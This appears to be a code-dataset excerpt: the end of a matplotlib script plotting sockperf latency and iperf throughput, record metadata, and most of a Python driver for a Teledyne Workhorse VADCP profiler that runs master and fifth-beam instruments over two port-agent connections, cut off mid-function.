percentiles.append( ( float(match.group("value")), match.group("percent") ) )
continue
match = sample_re.match(line)
if match != None:
latency = float(match.group("rcv")) - float(match.group("snd"))
samples.append(latency*1000000)
f.close()
percentiles = {p[1]:(p[0]*2) for p in percentiles}
samples.sort()
samples = (samples, [float(i)/len(samples) for i in range(len(samples))])
return percentiles
#return (percentiles, samples)
def GetTputData(fileName): # total
Mbits_re = re.compile(r".*\s+(?P<t1>\S+)-\s*(?P<t2>\S+)\s+sec.*\s+(?P<value>\S+)\s*Mbits/sec")
Gbits_re = re.compile(r".*\s+(?P<t1>\S+)-\s*(?P<t2>\S+)\s+sec.*\s+(?P<value>\S+)\s*Gbits/sec")
tput = []
f = open(fileName, 'r')
for line in f.readlines():
# print line
match = Mbits_re.match(line)
if match!=None:
t1 = float(match.group("t1"))
t2 = float(match.group("t2"))
if t2-t1!=1:
return float(match.group("value"))
match = Gbits_re.match(line)
if match!=None:
# print 'match Gbits'
t1 = float(match.group("t1"))
t2 = float(match.group("t2"))
if t2-t1!=1:
return float(match.group("value"))*1000
def GetThresholds():
thresholds=[]
for f in os.listdir('.'):
if f.startswith('iperf'):
thresholds.append( int(f[5:].split('.')[0]) )
return sorted(thresholds)
def Plot():
thresholds = GetThresholds() #range(0, 30001, 1000)
xs = [ t/1000 for t in thresholds]
lines =[ [], [], [], [], [], [], []]
legends = [ 'MIN', '0.25', '0.5', '0.75', '0.99', '0.999', 'tput' ]
for t in thresholds:
sockfile = 'sockperf%d.log' % t
percentiles = GetCDFData(sockfile)
lines[0].append(percentiles['MIN'])
lines[1].append(percentiles['25.000'])
lines[2].append(percentiles['50.000'])
lines[3].append(percentiles['75.000'])
lines[4].append(percentiles['99.000'])
lines[5].append(percentiles['99.900'])
iperffile = 'iperf%d.log' % t
tput = GetTputData(iperffile)
lines[6].append(tput)
figName=FIGNAME
fig, ax = plt.subplots(figsize=FIGSIZE)
patterns=[]
for i in range(6):
p, = ax.plot(xs, lines[i], LINEPATTERNS[i], label=legends[i])
patterns.append(p)
ax2 = ax.twinx()
p, = ax2.plot(xs, lines[6], LINEPATTERNS[6], label=legends[6])
patterns.append(p)
ax.set_ylabel('RTT (us)')
ax2.set_ylabel('Throughput (Mbps)')
ax2.set_ylim(TPUT_YLIM)
ax.set_xlabel('Threshold (kB)')
ax.set_ylim(LATE_YLIM)
ax.yaxis.grid(True, linestyle='--')
plt.legend(patterns, [l.get_label() for l in patterns], ncol=1, loc='upper left', framealpha=1)
plt.tight_layout(rect=(0, 0, 1, 1))
pp = PdfPages(figName)
pp.savefig()
pp.close()
if __name__ == '__main__':
Plot()
|
fr
| 0.294494
|
#import matplotlib #====================param================================ #====================param================================ #return (percentiles, samples) # total # print line # print 'match Gbits' #range(0, 30001, 1000)
| 2.36784
| 2
|
mi/instrument/teledyne/workhorse/vadcp/driver.py
|
cdobs/mi-instrument
| 1
|
6628492
|
<reponame>cdobs/mi-instrument
import copy
import functools
import json
import time
import re
from contextlib import contextmanager
import mi.instrument.teledyne.workhorse.particles as particles
from mi.core.log import get_logger
from mi.instrument.teledyne.workhorse.pd0_parser import AdcpPd0Record
from mi.core.instrument.chunker import StringChunker
from mi.core.instrument.instrument_protocol import RE_PATTERN, DEFAULT_CMD_TIMEOUT, DEFAULT_WRITE_DELAY
from mi.core.instrument.protocol_param_dict import ParameterDictVisibility, ProtocolParameterDict
from mi.core.time_tools import get_timestamp_delayed
from mi.core.util import dict_equal
from mi.core.common import BaseEnum, InstErrorCode
from mi.core.exceptions import InstrumentConnectionException, SampleException
from mi.core.exceptions import InstrumentParameterException
from mi.core.exceptions import InstrumentProtocolException
from mi.core.exceptions import InstrumentTimeoutException
from mi.core.exceptions import InstrumentException
from mi.core.instrument.instrument_driver import SingleConnectionInstrumentDriver, DriverEvent
from mi.core.instrument.instrument_driver import DriverConnectionState
from mi.core.instrument.instrument_driver import DriverAsyncEvent
from mi.core.instrument.instrument_driver import DriverProtocolState
from mi.core.instrument.port_agent_client import PortAgentClient, PortAgentPacket
from mi.instrument.teledyne.workhorse.driver import WorkhorseParameter
from mi.instrument.teledyne.workhorse.driver import WorkhorsePrompt
from mi.instrument.teledyne.workhorse.driver import NEWLINE
from mi.instrument.teledyne.workhorse.driver import parameter_regexes
from mi.instrument.teledyne.workhorse.driver import parameter_extractors
from mi.instrument.teledyne.workhorse.driver import parameter_formatters
from mi.instrument.teledyne.workhorse.driver import parameter_defaults
from mi.instrument.teledyne.workhorse.driver import parameter_types
from mi.instrument.teledyne.workhorse.driver import parameter_names
from mi.instrument.teledyne.workhorse.driver import parameter_descriptions
from mi.instrument.teledyne.workhorse.driver import parameter_ranges
from mi.instrument.teledyne.workhorse.driver import parameter_startup
from mi.instrument.teledyne.workhorse.driver import parameter_direct
from mi.instrument.teledyne.workhorse.driver import parameter_visibility
from mi.instrument.teledyne.workhorse.driver import parameter_units, WorkhorseProtocol
from mi.instrument.teledyne.workhorse.driver import WorkhorseProtocolState
from mi.instrument.teledyne.workhorse.driver import WorkhorseInstrumentCommands
from mi.instrument.teledyne.workhorse.driver import WorkhorseProtocolEvent
from mi.instrument.teledyne.workhorse.driver import ADCP_COMPASS_CALIBRATION_REGEX_MATCHER
from mi.instrument.teledyne.workhorse.driver import ADCP_PD0_PARSED_REGEX_MATCHER
from mi.instrument.teledyne.workhorse.driver import ADCP_SYSTEM_CONFIGURATION_REGEX_MATCHER
from mi.instrument.teledyne.workhorse.driver import ADCP_ANCILLARY_SYSTEM_DATA_REGEX_MATCHER
from mi.instrument.teledyne.workhorse.driver import ADCP_TRANSMIT_PATH_REGEX_MATCHER
from mi.instrument.teledyne.workhorse.driver import WorkhorseEngineeringParameter
from mi.instrument.teledyne.workhorse.driver import TIMEOUT
from mi.instrument.teledyne.workhorse.driver import WorkhorseScheduledJob
from mi.instrument.teledyne.workhorse.particles import VADCPDataParticleType, WorkhorseDataParticleType
log = get_logger()
# Per-head parameter defaults for the VADCP: start from the generic Workhorse
# defaults, then override the handful of values that differ between the
# 4-beam (master) and 5th-beam (slave) transducers.
master_parameter_defaults = copy.deepcopy(parameter_defaults)
master_parameter_defaults.update({
    WorkhorseParameter.TRANSDUCER_DEPTH: 2000,
    WorkhorseParameter.RDS3_MODE_SEL: 1,
    WorkhorseParameter.SYNCH_DELAY: 100,
    WorkhorseParameter.BLANK_AFTER_TRANSMIT: 88,
    WorkhorseParameter.NUMBER_OF_DEPTH_CELLS: 220,
    WorkhorseParameter.DEPTH_CELL_SIZE: 100,
    WorkhorseParameter.TIME_PER_PING: '00:01.00',
})
slave_parameter_defaults = copy.deepcopy(parameter_defaults)
slave_parameter_defaults.update({
    WorkhorseParameter.TRANSDUCER_DEPTH: 2000,
    WorkhorseParameter.RDS3_MODE_SEL: 2,
    WorkhorseParameter.SYNCH_DELAY: 0,
    WorkhorseParameter.BLANK_AFTER_TRANSMIT: 83,
    WorkhorseParameter.NUMBER_OF_DEPTH_CELLS: 220,
    WorkhorseParameter.DEPTH_CELL_SIZE: 94,
    WorkhorseParameter.TIME_PER_PING: '00:00.00',
})
class SlaveProtocol(BaseEnum):
    """
    Names for the two port-agent connections managed by this driver/protocol
    pair: the 4-beam (master) instrument and the 5th-beam (slave) instrument.
    """
    FOURBEAM = '4Beam'
    FIFTHBEAM = '5thBeam'
class InstrumentDriver(SingleConnectionInstrumentDriver):
    # VADCP driver: subclasses SingleConnectionInstrumentDriver but actually
    # manages TWO port-agent connections (master 4-beam and slave 5th-beam),
    # stored in a dict keyed by SlaveProtocol, behind one connection FSM.
    def __init__(self, evt_callback, refdes=None):
        """
        InstrumentDriver constructor.
        @param evt_callback Driver process event callback.
        @param refdes reference designator, used to auto-discover port agent
            configs ('<refdes>-4' and '<refdes>-5') when none is supplied.
        """
        SingleConnectionInstrumentDriver.__init__(self, evt_callback, refdes)
        # multiple portAgentClient
        self._connection = {}
    def _build_protocol(self):
        """
        Construct the driver protocol state machine.
        """
        # The protocol is handed the list of connection names; the actual
        # connection objects are attached later, once comms are established.
        self._protocol = Protocol(WorkhorsePrompt, NEWLINE, self._driver_event,
                                  connections=[SlaveProtocol.FOURBEAM, SlaveProtocol.FIFTHBEAM])
    def _handler_inst_disconnected_connect(self, *args, **kwargs):
        """
        Handle a (re)connect while in the instrument-disconnected state:
        rebuild the protocol and wire both existing port-agent connections
        into it.
        @return (next_state, result) tuple, (DriverConnectionState.CONNECTED, None).
        """
        self._build_protocol()
        self.set_init_params({})
        self._protocol.connections[SlaveProtocol.FOURBEAM] = self._connection[SlaveProtocol.FOURBEAM]
        self._protocol.connections[SlaveProtocol.FIFTHBEAM] = self._connection[SlaveProtocol.FIFTHBEAM]
        return DriverConnectionState.CONNECTED, None
    def _handler_disconnected_connect(self, *args, **kwargs):
        """
        Establish communications with the device via port agent / logger and
        construct and initialize a protocol FSM for device interaction.
        @return (next_state, result) tuple, (DriverConnectionState.CONNECTED, None) if successful.
        """
        # NOTE(review): on success this returns INST_DISCONNECTED, not
        # CONNECTED -- presumably the transition to CONNECTED happens later,
        # driven by the port agent's 'CONNECTED' status packet (see
        # _got_data); confirm against the connection FSM.
        next_state = DriverConnectionState.INST_DISCONNECTED
        result = None
        # for Master first
        try:
            self._connection[SlaveProtocol.FOURBEAM].init_comms()
            self._connection[SlaveProtocol.FIFTHBEAM].init_comms()
        except InstrumentConnectionException as e:
            log.error("Connection Exception: %s", e)
            log.error("Instrument Driver returning to unconfigured state.")
            next_state = DriverConnectionState.UNCONFIGURED
        init_config = {}
        if len(args) > 0 and isinstance(args[0], dict):
            init_config = args[0]
        self.set_init_params(init_config)
        return next_state, (next_state, result)
    def _handler_connected_disconnect(self, *args, **kwargs):
        """
        Disconnect to the device via port agent / logger and destroy the protocol FSM.
        @return (next_state, result) tuple, (DriverConnectionState.UNCONFIGURED, None) if successful.
        """
        next_state = DriverConnectionState.UNCONFIGURED
        result = None
        # Stop comms on BOTH port agent clients before tearing down the protocol.
        for connection in self._connection.values():
            connection.stop_comms()
        self._destroy_protocol()
        return next_state, (next_state, result)
    def _handler_connected_connection_lost(self, *args, **kwargs):
        """
        The device connection was lost. Stop comms, destroy protocol FSM and revert to unconfigured state.
        @return (next_state, result) tuple, (DriverConnectionState.UNCONFIGURED, None).
        """
        for connection in self._connection.values():
            connection.stop_comms()
        self._destroy_protocol()
        return DriverConnectionState.UNCONFIGURED, None
    def _build_connection(self, *args, **kwargs):
        """
        Constructs and returns a Connection object according to the given
        configuration. The connection object is a LoggerClient instance in
        this base class. Subclasses can overwrite this operation as needed.
        The value returned by this operation is assigned to self._connection
        and also to self._protocol._connection upon entering in the
        DriverConnectionState.CONNECTED state.
        @param all_configs configuration dict
        @returns a dictionary of Connection instances, which will be assigned to self._connection
        @throws InstrumentParameterException Invalid configuration.
        """
        all_configs = kwargs.get('config', None)  # via kwargs
        if all_configs is None and len(args) > 0:
            all_configs = args[0]  # via first argument
        if all_configs is None:
            # No config supplied: auto-discover one port agent per beam head
            # using the reference designator suffixes '-4' and '-5'.
            all_configs = {SlaveProtocol.FOURBEAM: self._get_port_agent_config(self.refdes + '-4'),
                           SlaveProtocol.FIFTHBEAM: self._get_port_agent_config(self.refdes + '-5')}
        for key in all_configs:
            if all_configs[key] is None:
                raise InstrumentParameterException('No %s port agent config supplied and failed to auto-discover' % key)
        connections = {}
        for name, config in all_configs.items():
            if not isinstance(config, dict):
                continue
            if 'mock_port_agent' in config:
                mock_port_agent = config['mock_port_agent']
                # check for validity here...
                if mock_port_agent is not None:
                    connections[name] = mock_port_agent
            else:
                try:
                    addr = config['addr']
                    port = config['port']
                    cmd_port = config.get('cmd_port')
                    if isinstance(addr, basestring) and isinstance(port, int) and len(addr) > 0:
                        # Bind the connection name into the data callback so
                        # incoming packets can be routed to the right chunker.
                        callback = functools.partial(self._got_data, connection=name)
                        connections[name] = PortAgentClient(addr, port, cmd_port, callback,
                                                            self._lost_connection_callback)
                    else:
                        raise InstrumentParameterException('Invalid comms config dict in build_connections.')
                except (TypeError, KeyError) as e:
                    raise InstrumentParameterException('Invalid comms config dict.. %r' % e)
        return connections
    def get_direct_config(self):
        """
        Note - must override if instrument driver has more than one instrument configuration.
        :return: list of dictionaries containing direct access configuration and commands
        """
        config = []
        if self._protocol:
            # One direct-access config entry per beam head, each with its own
            # title and port agent endpoints.
            for idx, connection in enumerate([SlaveProtocol.FOURBEAM, SlaveProtocol.FIFTHBEAM]):
                config.append({})
                config[idx] = self._protocol.get_direct_config()
                if connection is SlaveProtocol.FOURBEAM:
                    config[idx]['title'] = 'Beams 1-4'
                if connection is SlaveProtocol.FIFTHBEAM:
                    config[idx]['title'] = '5th Beam'
                # NOTE(review): 'uft20' looks like a site-specific fallback
                # host -- confirm this default is still appropriate.
                config[idx]['ip'] = self._port_agent_config.get(connection, {}).get('host', 'uft20')
                config[idx]['data'] = self._port_agent_config.get(connection, {}).get('ports', {}).get('da')
                config[idx]['sniffer'] = \
                    self._port_agent_config.get(connection, {}).get('ports', {}).get('sniff')
        return config
    def _got_data(self, port_agent_packet, connection=None):
        """
        Port agent data callback. Routes config/status packets to driver-level
        handling and everything else to the protocol, tagged with the
        originating connection name.
        :param port_agent_packet: PortAgentPacket (or Exception) from the client
        :param connection: SlaveProtocol member identifying the source
        """
        if isinstance(port_agent_packet, Exception):
            return self._got_exception(port_agent_packet)
        if isinstance(port_agent_packet, PortAgentPacket):
            packet_type = port_agent_packet.get_header_type()
            data = port_agent_packet.get_data()
            if packet_type == PortAgentPacket.PORT_AGENT_CONFIG:
                try:
                    paconfig = json.loads(data)
                    self._port_agent_config[connection] = paconfig
                    self._driver_event(DriverAsyncEvent.DRIVER_CONFIG, paconfig)
                except ValueError as e:
                    log.exception('Unable to parse port agent config: %r %r', data, e)
            elif packet_type == PortAgentPacket.PORT_AGENT_STATUS:
                current_state = self._connection_fsm.get_current_state()
                if data == 'DISCONNECTED':
                    self._async_raise_event(DriverEvent.PA_CONNECTION_LOST)
                elif data == 'CONNECTED':
                    if current_state == DriverConnectionState.INST_DISCONNECTED:
                        self._async_raise_event(DriverEvent.CONNECT)
            else:
                if connection and self._protocol:
                    self._protocol.got_data(port_agent_packet, connection=connection)
class Protocol(WorkhorseProtocol):
    """
    VADCP protocol: extends WorkhorseProtocol to drive two instruments
    (4-beam master, 5th-beam slave) over separate port-agent connections.
    All buffer/chunker state is duplicated per connection, and most low-level
    command helpers require an explicit 'connection' keyword.
    """
    def __init__(self, prompts, newline, driver_event, connections=None):
        """
        Constructor.
        @param prompts Enum class containing possible device prompts used for
        command response logic.
        @param newline The device newline.
        @driver_event The callback for asynchronous driver events.
        @param connections list of connection names (SlaveProtocol members).
        @raise InstrumentProtocolException if connections is not a list.
        """
        if not type(connections) is list:
            raise InstrumentProtocolException('Unable to instantiate multi connection protocol without connection list')
        # Secondary parameter dict used to match slave ('_5th') parameters
        # against instrument responses (see _build_param_dict).
        self._param_dict2 = ProtocolParameterDict()
        # Construct superclass.
        WorkhorseProtocol.__init__(self, prompts, newline, driver_event)
        # Create multiple connection versions of the pieces of protocol involving data to/from the instrument
        self._linebuf = {connection: '' for connection in connections}
        self._promptbuf = {connection: '' for connection in connections}
        self._last_data_timestamp = {connection: None for connection in connections}
        self.connections = {connection: None for connection in connections}
        self.chunkers = {connection: StringChunker(self.sieve_function) for connection in connections}
    def _get_response(self, timeout=10, expected_prompt=None, response_regex=None, connection=None):
        """
        Overridden to handle multiple port agent connections.
        Poll the named connection's line/prompt buffers until the regex
        matches or one of the expected prompts is found.
        @raise InstrumentProtocolException on bad arguments or missing connection.
        @raise InstrumentTimeoutException if nothing matches within timeout.
        """
        if connection is None:
            raise InstrumentProtocolException('_get_response: no connection supplied!')
        # Grab time for timeout and wait for prompt.
        end_time = time.time() + timeout
        if response_regex and not isinstance(response_regex, RE_PATTERN):
            raise InstrumentProtocolException('Response regex is not a compiled pattern!')
        if expected_prompt and response_regex:
            raise InstrumentProtocolException('Cannot supply both regex and expected prompt!')
        if expected_prompt is None:
            prompt_list = self._get_prompts()
        else:
            if isinstance(expected_prompt, basestring):
                prompt_list = [expected_prompt]
            else:
                prompt_list = expected_prompt
        if response_regex is None:
            pattern = None
        else:
            pattern = response_regex.pattern
        log.debug('_get_response: timeout=%s, prompt_list=%s, expected_prompt=%r, response_regex=%r, promptbuf=%r',
                  timeout, prompt_list, expected_prompt, pattern, self._promptbuf)
        while time.time() < end_time:
            if response_regex:
                # noinspection PyArgumentList
                match = response_regex.search(self._linebuf[connection])
                if match:
                    return match.groups()
            else:
                for item in prompt_list:
                    index = self._promptbuf[connection].find(item)
                    if index >= 0:
                        result = self._promptbuf[connection][0:index + len(item)]
                        return item, result
            time.sleep(.1)
        raise InstrumentTimeoutException("in InstrumentProtocol._get_response()")
    def _do_cmd_resp(self, cmd, *args, **kwargs):
        """
        Overridden to handle multiple port agent connections.
        Send a command on the given connection, wait for the response, and
        run the registered response handler (if any).
        @return the response handler's result, or None.
        """
        connection = kwargs.get('connection')
        if connection is None:
            raise InstrumentProtocolException('_do_cmd_resp: no connection supplied!')
        # Get timeout and initialize response.
        timeout = kwargs.get('timeout', DEFAULT_CMD_TIMEOUT)
        expected_prompt = kwargs.get('expected_prompt', None)
        response_regex = kwargs.get('response_regex', None)
        if response_regex and not isinstance(response_regex, RE_PATTERN):
            raise InstrumentProtocolException('Response regex is not a compiled pattern!')
        if expected_prompt and response_regex:
            raise InstrumentProtocolException('Cannot supply both regex and expected prompt!')
        self._do_cmd_no_resp(cmd, *args, **kwargs)
        # Wait for the prompt, prepare result and return, timeout exception
        if response_regex:
            prompt = ""
            result_tuple = self._get_response(timeout,
                                              connection=connection,
                                              response_regex=response_regex,
                                              expected_prompt=expected_prompt)
            result = "".join(result_tuple)
        else:
            (prompt, result) = self._get_response(timeout,
                                                  connection=connection,
                                                  expected_prompt=expected_prompt)
        # State-specific handler takes precedence over the generic one.
        resp_handler = self._response_handlers.get((self.get_current_state(), cmd),
                                                   self._response_handlers.get(cmd, None))
        resp_result = None
        if callable(resp_handler):
            resp_result = resp_handler(result, prompt)
        return resp_result
    def _send_data(self, data, write_delay=0, connection=None):
        """
        Write data to the named connection, optionally pacing it one
        character at a time with write_delay seconds between characters.
        """
        if connection is None:
            raise InstrumentProtocolException('_send_data: no connection supplied!')
        if write_delay == 0:
            self.connections[connection].send(data)
        else:
            for char in data:
                self.connections[connection].send(char)
                time.sleep(write_delay)
    def _do_cmd_no_resp(self, cmd, *args, **kwargs):
        """
        Overridden to handle multiple port agent connections.
        Wake the instrument on the given connection, clear its buffers and
        send the built command without waiting for a response.
        """
        connection = kwargs.get('connection')
        if connection is None:
            raise InstrumentProtocolException('_do_cmd_no_resp: no connection supplied! %r %r %r' % (cmd, args, kwargs))
        timeout = kwargs.get('timeout', DEFAULT_CMD_TIMEOUT)
        write_delay = kwargs.get('write_delay', DEFAULT_WRITE_DELAY)
        build_handler = self._build_handlers.get(cmd, None)
        if not callable(build_handler):
            log.error('_do_cmd_no_resp: no handler for command: %s' % cmd)
            raise InstrumentProtocolException(error_code=InstErrorCode.BAD_DRIVER_COMMAND)
        cmd_line = build_handler(cmd, *args)
        # Wakeup the device, timeout exception as needed
        self._wakeup(timeout, connection=connection)
        # Clear line and prompt buffers for result, then send command.
        self._linebuf[connection] = ''
        self._promptbuf[connection] = ''
        self._send_data(cmd_line, write_delay, connection=connection)
    def _do_cmd_direct(self, cmd, connection=None):
        """
        Issue an untranslated command to the instrument. No response is handled
        as a result of the command.
        @param cmd The high level command to issue
        """
        # Send command.
        self._send_data(cmd, connection=connection)
    ########################################################################
    # Incoming data (for parsing) callback.
    ########################################################################
    def got_data(self, port_agent_packet, connection=None):
        """
        Called by the instrument connection when data is available.
        Append line and prompt buffers.
        Also add data to the chunker and when received call got_chunk
        to publish results.
        :param connection: connection which produced this packet
        :param port_agent_packet: packet of data
        """
        if connection is None:
            raise InstrumentProtocolException('got_data: no connection supplied!')
        data_length = port_agent_packet.get_data_length()
        data = port_agent_packet.get_data()
        timestamp = port_agent_packet.get_timestamp()
        log.debug("Got Data: %r %r", connection, data)
        log.debug("Add Port Agent Timestamp: %r %s", connection, timestamp)
        if data_length > 0:
            if self.get_current_state() == DriverProtocolState.DIRECT_ACCESS:
                self._driver_event(DriverAsyncEvent.DIRECT_ACCESS, data)
            self.add_to_buffer(data, connection=connection)
            # Feed the per-connection chunker and drain every complete chunk.
            self.chunkers[connection].add_chunk(data, timestamp)
            (timestamp, chunk) = self.chunkers[connection].get_next_data()
            while chunk:
                self._got_chunk(chunk, timestamp, connection=connection)
                (timestamp, chunk) = self.chunkers[connection].get_next_data()
    ########################################################################
    # Incoming raw data callback.
    ########################################################################
    def got_raw(self, port_agent_packet, connection=None):
        """
        Called by the port agent client when raw data is available, such as data
        sent by the driver to the instrument, the instrument responses,etc.
        :param connection: connection which produced this packet
        :param port_agent_packet: packet of data
        """
        self.publish_raw(port_agent_packet, connection)
    def publish_raw(self, port_agent_packet, connection=None):
        """Raw-sample publication is intentionally disabled for the VADCP."""
        pass
    def add_to_buffer(self, data, connection=None):
        """
        Add a chunk of data to the internal data buffers
        buffers implemented as lifo ring buffer
        :param data: bytes to add to the buffer
        :param connection: connection which produced this packet
        """
        # Update the line and prompt buffers.
        self._linebuf[connection] += data
        self._promptbuf[connection] += data
        self._last_data_timestamp[connection] = time.time()
        # If our buffer exceeds the max allowable size then drop the leading
        # characters on the floor.
        if len(self._linebuf[connection]) > self._max_buffer_size():
            self._linebuf[connection] = self._linebuf[connection][self._max_buffer_size() * -1:]
        # If our buffer exceeds the max allowable size then drop the leading
        # characters on the floor.
        if len(self._promptbuf[connection]) > self._max_buffer_size():
            self._promptbuf[connection] = self._promptbuf[connection][self._max_buffer_size() * -1:]
        log.debug("LINE BUF: %r", self._linebuf[connection][-50:])
        log.debug("PROMPT BUF: %r", self._promptbuf[connection][-50:])
    ########################################################################
    # Wakeup helpers.
    ########################################################################
    def _send_wakeup(self, connection=None):
        """
        Send a wakeup to the device. Overridden by device specific
        subclasses.
        """
        self.connections[connection].send(NEWLINE)
    def _wakeup(self, timeout, delay=1, connection=None):
        """
        Clear buffers and send a wakeup command to the instrument
        @param timeout The timeout to wake the device.
        @param delay The time to wait between consecutive wakeups.
        @param connection the connection to wake.
        @throw InstrumentTimeoutException if the device could not be woken.
        """
        if connection is None:
            raise InstrumentProtocolException('_wakeup: no connection supplied!')
        # Clear the prompt buffer.
        log.trace("clearing promptbuf: %r", self._promptbuf)
        self._promptbuf[connection] = ''
        # Grab time for timeout.
        starttime = time.time()
        while True:
            # Send a line return and wait a sec.
            log.trace('Sending wakeup. timeout=%s', timeout)
            self._send_wakeup(connection=connection)
            time.sleep(delay)
            log.trace("Prompts: %s", self._get_prompts())
            for item in self._get_prompts():
                log.trace("buffer: %r", self._promptbuf[connection])
                log.trace("find prompt: %r", item)
                index = self._promptbuf[connection].find(item)
                log.trace("Got prompt (index: %s): %r ", index, self._promptbuf[connection])
                if index >= 0:
                    log.trace('wakeup got prompt: %r', item)
                    return item
            log.trace("Searched for all prompts")
            if time.time() > starttime + timeout:
                raise InstrumentTimeoutException("in _wakeup()")
    def _build_param_dict(self):
        """
        Build the parameter dictionary: one full set of ADCP parameters for
        the master instrument and a parallel '_5th'-suffixed set for the
        slave. A second dict (_param_dict2) holds the slave parameters with
        their real regexes so slave responses can be matched and copied back.
        """
        # We're going to build two complete sets of ADCP parameters here
        # one set for the master instrument and one for the slave
        for param in parameter_regexes:
            self._param_dict.add(param,
                                 parameter_regexes.get(param),
                                 parameter_extractors.get(param),
                                 parameter_formatters.get(param),
                                 type=parameter_types.get(param),
                                 display_name=parameter_names.get(param),
                                 description=parameter_descriptions.get(param),
                                 range=parameter_ranges.get(param),
                                 startup_param=parameter_startup.get(param, False),
                                 direct_access=parameter_direct.get(param, False),
                                 visibility=parameter_visibility.get(param, ParameterDictVisibility.READ_WRITE),
                                 default_value=master_parameter_defaults.get(param),
                                 units=parameter_units.get(param))
        for param in parameter_regexes:
            # Scheduled events are handled by the master
            if WorkhorseEngineeringParameter.has(param):
                continue
            # Slave entries get a never-matching regex here; real matching is
            # done through _param_dict2 below.
            self._param_dict.add(param + '_5th',
                                 r'DONTMATCHMEIMNOTREAL!',
                                 parameter_extractors.get(param),
                                 parameter_formatters.get(param),
                                 type=parameter_types.get(param),
                                 display_name=parameter_names.get(param) + ' (5th beam)',
                                 description=parameter_descriptions.get(param),
                                 range=parameter_ranges.get(param),
                                 startup_param=parameter_startup.get(param, False),
                                 direct_access=parameter_direct.get(param, False),
                                 visibility=parameter_visibility.get(param, ParameterDictVisibility.READ_WRITE),
                                 default_value=slave_parameter_defaults.get(param),
                                 units=parameter_units.get(param))
        self._param_dict.set_default(WorkhorseParameter.CLOCK_SYNCH_INTERVAL)
        self._param_dict.set_default(WorkhorseParameter.GET_STATUS_INTERVAL)
        # now we're going to build a whole 'nother param dict for the slave parameters
        # that contain regex values so we can fill them in easily...
        for param in parameter_regexes:
            # Scheduled events are handled by the master
            if WorkhorseEngineeringParameter.has(param):
                continue
            self._param_dict2.add(param + '_5th',
                                  parameter_regexes.get(param),
                                  parameter_extractors.get(param),
                                  parameter_formatters.get(param))
    # #######################################################################
    # Private helpers.
    # #######################################################################
    def _got_chunk(self, chunk, timestamp, connection=None):
        """
        The base class got_data has gotten a chunk from the chunker.
        Pass it to extract_sample with the appropriate particle
        objects and REGEXes.
        """
        if ADCP_PD0_PARSED_REGEX_MATCHER.match(chunk):
            pd0 = AdcpPd0Record(chunk)
            transform = pd0.coord_transform.coord_transform
            # Only BEAM transform supported for VADCP
            if transform != particles.Pd0CoordinateTransformType.BEAM:
                raise SampleException('Received unsupported coordinate transform type: %s' % transform)
            # Master and slave publish different particle classes for the
            # same PD0 record structure.
            if connection == SlaveProtocol.FOURBEAM:
                science = particles.VadcpBeamMasterParticle(pd0, port_timestamp=timestamp).generate()
                config = particles.AdcpPd0ConfigParticle(pd0, port_timestamp=timestamp).generate()
                engineering = particles.AdcpPd0EngineeringParticle(pd0, port_timestamp=timestamp).generate()
            else:
                science = particles.VadcpBeamSlaveParticle(pd0, port_timestamp=timestamp).generate()
                config = particles.VadcpConfigSlaveParticle(pd0, port_timestamp=timestamp).generate()
                engineering = particles.VadcpEngineeringSlaveParticle(pd0, port_timestamp=timestamp).generate()
            # Science always goes out; config/engineering only when changed.
            out_particles = [science]
            for particle in [config, engineering]:
                if self._changed(particle):
                    out_particles.append(particle)
            for particle in out_particles:
                self._driver_event(DriverAsyncEvent.SAMPLE, particle)
        else:
            if connection == SlaveProtocol.FIFTHBEAM:
                if self._extract_sample(particles.VadcpCompassCalibrationDataParticle,
                                        ADCP_COMPASS_CALIBRATION_REGEX_MATCHER,
                                        chunk,
                                        timestamp):
                    return
                if self._extract_sample(particles.VadcpSystemConfigurationDataParticle,
                                        ADCP_SYSTEM_CONFIGURATION_REGEX_MATCHER,
                                        chunk,
                                        timestamp):
                    return
                if self._extract_sample(particles.VadcpAncillarySystemDataParticle,
                                        ADCP_ANCILLARY_SYSTEM_DATA_REGEX_MATCHER,
                                        chunk,
                                        timestamp):
                    return
                if self._extract_sample(particles.VadcpTransmitPathParticle,
                                        ADCP_TRANSMIT_PATH_REGEX_MATCHER,
                                        chunk,
                                        timestamp):
                    return
            elif connection == SlaveProtocol.FOURBEAM:
                if self._extract_sample(particles.AdcpCompassCalibrationDataParticle,
                                        ADCP_COMPASS_CALIBRATION_REGEX_MATCHER,
                                        chunk,
                                        timestamp):
                    return
                if self._extract_sample(particles.AdcpSystemConfigurationDataParticle,
                                        ADCP_SYSTEM_CONFIGURATION_REGEX_MATCHER,
                                        chunk,
                                        timestamp):
                    return
                if self._extract_sample(particles.AdcpAncillarySystemDataParticle,
                                        ADCP_ANCILLARY_SYSTEM_DATA_REGEX_MATCHER,
                                        chunk,
                                        timestamp):
                    return
                if self._extract_sample(particles.AdcpTransmitPathParticle,
                                        ADCP_TRANSMIT_PATH_REGEX_MATCHER,
                                        chunk,
                                        timestamp):
                    return
    def _send_break_cmd(self, delay, connection=None):
        """
        Send a BREAK to attempt to wake the device.
        """
        self.connections[connection].send_break(delay)
    def _sync_clock(self, command, date_time_param, timeout=TIMEOUT, delay=1, time_format="%Y/%m/%d,%H:%M:%S"):
        """
        Send the command to the instrument to synchronize the clock
        @param command set command
        @param date_time_param: date time parameter that we want to set
        @param timeout: command timeout
        @param delay: wakeup delay
        @param time_format: time format string for set command
        """
        # NOTE(review): time_format is accepted but unused -- the call below
        # hard-codes a format (with a space after the comma). Confirm the
        # instrument requires that exact format before unifying.
        log.info("SYNCING TIME WITH SENSOR.")
        for connection in self.connections:
            self._do_cmd_resp(command, date_time_param, get_timestamp_delayed("%Y/%m/%d, %H:%M:%S"),
                              timeout=timeout, connection=connection)
    # #######################################################################
    # Startup parameter handlers
    ########################################################################
    def _get_params(self, parameters, connection):
        """
        Query a list of parameters on one connection with a single batched
        command and return the raw response (matched from first parameter
        through the prompt following the last).
        """
        command = NEWLINE.join(['%s?' % p for p in parameters]) + NEWLINE
        if len(parameters) > 1:
            regex = re.compile(r'(%s.*?%s.*?>)' % (parameters[0], parameters[-1]), re.DOTALL)
        else:
            regex = re.compile(r'(%s.*?>)' % parameters[0], re.DOTALL)
        self._linebuf[connection] = ''
        self._promptbuf[connection] = ''
        self._do_cmd_direct(command, connection=connection)
        return self._get_response(response_regex=regex, connection=connection)
    def _update_params(self, *args, **kwargs):
        """
        Update the parameter dictionary.
        Queries master parameters on the 4-beam connection and '_5th'
        parameters on the 5th-beam connection, then raises CONFIG_CHANGE
        if anything (other than TT) changed, or if kwargs['force'] is set.
        """
        # see if we passed in a list of parameters to query
        # if not, use the whole parameter list
        parameters = kwargs.get('params')
